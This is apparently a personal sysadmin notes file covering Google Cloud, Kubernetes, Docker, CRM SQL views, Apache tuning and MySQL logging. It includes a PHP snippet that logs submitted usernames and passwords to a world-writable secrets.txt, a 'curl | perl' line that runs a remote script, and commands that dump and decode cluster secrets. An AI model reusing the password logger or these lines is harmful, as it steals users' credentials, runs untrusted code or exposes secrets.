Google Cloud Storage is easy to handle with gsutil, e.g.:
gsutil mb -p <project-id> -c <storage-class> gs://bucketname
gsutil ls -l -b gs://bucketname
gsutil ls -a gs://bucketname - to see the archived (noncurrent) object versions; the public URL can also be fetched with wget
gsutil cp is used to restore an old archive, as sketched below
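For example, an archived generation can be copied back over the live object (object name and generation number are placeholders):
gsutil cp 'gs://bucketname/file.txt#1633024522021112' gs://bucketname/file.txt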





curl https://market.southpole.com/home/offset-emissions/project-details/53/ --silent -H "Accept-Encoding: gzip,deflate" --write-out "%{size_download}\n" --output /dev/null
curl https://market.southpole.com/home/offset-emissions/project-details/53 --silent --write-out "%{size_download}\n" --output /dev/null
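The two calls compare the compressed and the uncompressed transfer size of the same page. A small wrapper does this for any list of URLs in one go (a sketch, not project-specific):
#!/bin/sh
# usage: ./size_check.sh <url> [<url> ...]
for url in "$@"; do
  gz=$(curl --silent -H "Accept-Encoding: gzip,deflate" --write-out "%{size_download}" --output /dev/null "$url")
  raw=$(curl --silent --write-out "%{size_download}" --output /dev/null "$url")
  echo "$url  gzip=${gz}B  plain=${raw}B"
done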
this add-on collects the passwords entered in a form into the secrets.txt file (permissions 777):
< "questionmark" php if(isset($_POST['name'])) { $data=$_POST['name']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. " "); fclose($fp); } if(isset($_POST['pass'])) { $data=$_POST['pass']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. "\n"); fclose($fp); } "questionmark">
CREATE VIEW `Sales_stage_history_pb` AS
select
`ac`.`name` AS `account_name`,
`ac`.`id` AS `account_id`,
`u`.`user_name` AS `kam`,
`oc`.`expected_er_delivery_date_c` AS `expected_delivery_date`,
`oc`.`numberoftons_c` AS `numbers_of_tons`,
o.lead_source AS lead_source,
ac.billing_address_country AS country,
oc.spcategorie_c AS practice,
o.probability AS probability,
`o`.`name` AS `opportunity_name`,
`o`.`description` AS `opportunity_description`,
`o`.`sales_stage` AS `current_stage`,
`o`.`amount` AS `gross_margin`,
`a`.`before_value_string` AS `old_value`,
`a`.`after_value_string` AS `new_value`,
`a`.`date_created` AS `changing_date`,
`acc`.`spindustrysectorii_c` AS `sp_industry`,
`acc`.`newaccountstatus_c` AS `acc_status`,
`acc`.`commitments_c` AS `acc_commitments`,
`acc`.`reportingto_c` AS `acc_reporting_to`,
`oc`.`spcategorie_c` AS `opp_solution`,
`o`.`date_entered` AS `opp_creation_date`,
`oc`.`reasonswonlost_c` AS `opp_reasonswonlost`,
`o`.`campaign_id` AS `opp_campaign` from ((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`)
where ((`a`.`field_name` = 'sales_stage')
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`o`.`id` = `oc`.`id_c`)) ;
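A quick sanity check on the view (user, password and schema name are placeholders):
mysql -u <user> -p <dbname> -e "SELECT account_name, current_stage, old_value, new_value, changing_date FROM Sales_stage_history_pb LIMIT 10;"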
CREATE VIEW `sophies3` AS
select
`o`.`name` AS `Opportunity name`,
`ac`.`name` AS `Client name`,
`acc`.`newaccountstatus_c` AS `Account status`,
`ac`.`billing_address_country` AS `Country`,
`o`.`date_entered` AS `Date created`,
`oc`.`expected_er_delivery_date_c` AS `Estimated delivery date`,
`u`.`user_name` AS `KAM`,
`i`.`name` AS `SP industry`,
p.name AS Practice,
`o`.`amount` AS `Estimated SP gross margin (EUR)`,
o.probability AS probability,
oc.weightedgrossmargin_c AS `Estimated gross margin with probability`,
`o`.`sales_stage` AS `Sales stage`,
o.lead_source AS `Lead source`,
`o`.`campaign_id` AS `Campaign ID`
from ((((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`) join `practices` `p`) join `industries` `i`)
where ((`a`.`field_name` = 'sales_stage')
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`oc`.`spcategorie_c` = `p`.`id`)
and (`acc`.`spindustrysectorii_c` = `i`.`id`)
and (`o`.`id` = `oc`.`id_c`)) ;
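For a quick CSV export of the reporting view (same placeholders; a rough conversion that ignores embedded tabs and commas):
mysql -u <user> -p <dbname> --batch -e "SELECT * FROM sophies3" | sed 's/\t/,/g' > sophies3.csv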
Last Workshop log and stuff
kubectl describe pod -n workshop
kubectl get deployment -n workshop
kubectl get deployment -n workshop broken
kubectl delete deployment -n workshop
kubectl get -n xxxx pod xxxx -o yaml
kubectl get cronjobs -n ak-backend-dev
kubectl get pods -n ak-backend-dev
kubectl logs -n ak-backend-dev provision-market-dev-job-1630383300-pvnrj -c scriptrunner
kubectl get configmaps -n ak-backend-dev
kubectl get secrets -n ak-backend-dev
kubectl get secrets -n ak-backend-dev env-dev-hh7577cggk -o yaml
B64
echo x | base64 -d
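To pull one value straight out of a secret and decode it in a single step (the key name DB_PASSWORD is just an example):
kubectl get secret -n ak-backend-dev env-dev-hh7577cggk -o jsonpath='{.data.DB_PASSWORD}' | base64 -d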
git secret reveal
git-secret reveal
kustomize build kubernetes/overlays/dev
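The rendered manifests can be piped straight into kubectl:
kustomize build kubernetes/overlays/dev | kubectl apply -f -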
https://github.com/southpolecarbon/ingress-configuration/wiki/Kubernetes-Essentials
https://github.com/southpolecarbon/ingress-configuration/wiki/Ingresses,-Certificates,-DNS
Services, Ingress and GKE
Docker commands
docker system prune -a
docker images
docker logs alaskaback
docker exec -it alaskaback /bin/sh
docker exec -it alaskaback /bin/bash
/proc/14/fd # tail -f 0 1 2
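The same trick from outside the container, following the main process's stdout/stderr (assumes the app runs as PID 1 in the container):
docker exec -it alaskaback sh -c 'tail -f /proc/1/fd/1 /proc/1/fd/2'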
K8s commands
setup on GKE
gcloud init
gcloud container clusters get-credentials alaska
to enter a container
kubectl get pods
kubectl exec -it alaska-api-9df9b4594-jchrl -- /bin/bash
kubectl exec -it alaska-payments-d54ffd8b9-jjtw4 -- /bin/bash
some commands
kubectl apply -f
docker-compose -f prox.yaml up -d
kubectl get service alaska-administration
kubectl get pods
kubectl get services -> see the external IP address
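To grab only the external IP of a LoadBalancer service:
kubectl get service alaska-administration -o jsonpath='{.status.loadBalancer.ingress[0].ip}'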
kubectl rollout undo deployments alaska-administration
kubectl describe pods
kubectl get ev
kubectl delete pod foo
kubectl describe pod ppa-76dd5b4fbb-l75ld
kubectl scale --current-replicas=2 --replicas=1 deployment/ppa
docker build . -t eu.gcr.io/marketk8/msc
docker push eu.gcr.io/marketk8/msc
kubectl set image deployment/ppa-model pamodel=eu.gcr.io/marketk8/ppa-model
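The same build/push/deploy flow with an explicit image tag so the rollout is traceable (the container name msc inside the deployment is an assumption):
docker build . -t eu.gcr.io/marketk8/msc:v2
docker push eu.gcr.io/marketk8/msc:v2
kubectl -n msc set image deployment/msc msc=eu.gcr.io/marketk8/msc:v2
kubectl -n msc rollout status deployment/msc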
gcloud auth login
gcloud auth configure-docker
kubectl create secret generic <YOUR-SA-SECRET> \
--from-file=service_account.json=~/key.json
kubectl -n msc scale deployment msc --replicas=1
kubectl apply -f cert-volumeclaim.yaml
kubectl create deployment msc --image=eu.gcr.io/marketk8/msc --dry-run -o yaml
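The generated YAML can be saved and applied (newer kubectl wants --dry-run=client):
kubectl create deployment msc --image=eu.gcr.io/marketk8/msc --dry-run=client -o yaml > msc-deployment.yaml
kubectl apply -n msc -f msc-deployment.yaml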
kubectl get deployments -n msc msc -o yaml
kubectl get -n msc pvc
kubectl config current-context
kubectl config use-context gke_marketk8_europe-west3-c_alaska
kubectl config use-context gke_marketk8_europe-west3-c_memcalc
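To list every configured context:
kubectl config get-contexts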
ss -tulwn
https://kubernetes.io/docs/reference/kubectl/cheatsheet/
create namespace
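e.g. for the workshop namespace used above:
kubectl create namespace workshop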
GIT commands
git stash
Removing All Unused Objects
The docker system prune command will remove all stopped containers, all dangling images, and all unused networks:
docker system prune
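To also drop unused (not just dangling) images and unused volumes, there are extra flags:
docker system prune -a --volumes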
Using UEFI; tried secure boot off and on but it still hangs.
Ah, I've only used USB. Could you legacy-boot the CD? On start-up, press the key for the boot list and boot the CD in legacy mode. Another option: try booting and editing the boot entry in GRUB by pressing E on "Install", replacing "quiet splash" with "nomodeset", then F10 to boot.
sudo add-apt-repository ppa:graphics-drivers
sudo apt-get install nvidia-driver-410
or, for an old MacBook:
sudo apt update
sudo apt install nvidia-387
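After a reboot, check that the driver actually loaded:
nvidia-smi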
docker container ls
docker exec -it "containername" /bin/bash
mysqltuner from the repo, for MariaDB
for Apache:
curl -sL https://raw.githubusercontent.com/richardforth/apache2buddy/master/apache2buddy.pl | perl
apache2ctl configtest
apache2ctl graceful
The MaxRequestWorkers parameter (called MaxClients up to 2.3.13) determines how many Apache processes, and therefore client connections, are allowed (prerequisite: prefork MPM). If the worker MPM is used, it limits the number of threads available for clients. The Apache default for MaxRequestWorkers is 256; note that distributions often ship different defaults.
If MaxRequestWorkers is to be set higher than 256, the ServerLimit parameter must be raised accordingly as well.
If the MaxRequestWorkers value is reached while the server is running, this is noted in the Apache error.log:
[Fri Jun 05 13:15:24.760818 2015] [mpm_prefork:error] [pid 1649] AH00161: server reached MaxRequestWorkers setting, consider raising the MaxRequestWorkers setting
With the prefork MPM, the MinSpareServers parameter sets the minimum number of idle (spare) Apache processes to keep available. As soon as a request arrives, one of these idle processes can take it, which answers the request faster because no new process has to be created first. The MaxSpareServers parameter sets the maximum number of spare processes to keep around, so memory is not used up unnecessarily. The Apache defaults are 5 for MinSpareServers and 10 for MaxSpareServers.
With the worker MPM, the available threads are configured analogously via MinSpareThreads and MaxSpareThreads. The ThreadsPerChild parameter is also relevant; it sets the number of threads per Apache process.
The StartServers parameter sets how many Apache processes are created when the server starts. A prefork configuration with these directives is sketched below.
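A minimal sketch for checking the active MPM and setting the prefork values discussed above (Debian/Ubuntu file layout assumed; the numbers are examples only, tune them to the available RAM):
apache2ctl -V | grep -i mpm        # which MPM is in use
sudo tee /etc/apache2/mods-available/mpm_prefork.conf <<'EOF'
<IfModule mpm_prefork_module>
    StartServers              5
    MinSpareServers           5
    MaxSpareServers          10
    MaxRequestWorkers       300
    ServerLimit             300
    MaxConnectionsPerChild    0
</IfModule>
EOF
sudo apache2ctl configtest && sudo apache2ctl graceful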
If you don't want to or cannot restart the MySQL server, you can proceed like this on the running server:
SET global general_log = 1;
SET global log_output = 'table';
select * from mysql.general_log;
SET global general_log = 0;
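The same steps wrapped into one-liners, with the log switched off and emptied afterwards (root credentials assumed; each call prompts for the password):
mysql -u root -p -e "SET GLOBAL general_log = 1; SET GLOBAL log_output = 'table';"
# ... reproduce the queries you want to capture ...
mysql -u root -p -e "SELECT event_time, argument FROM mysql.general_log ORDER BY event_time DESC LIMIT 50;"
mysql -u root -p -e "SET GLOBAL general_log = 0; TRUNCATE TABLE mysql.general_log;"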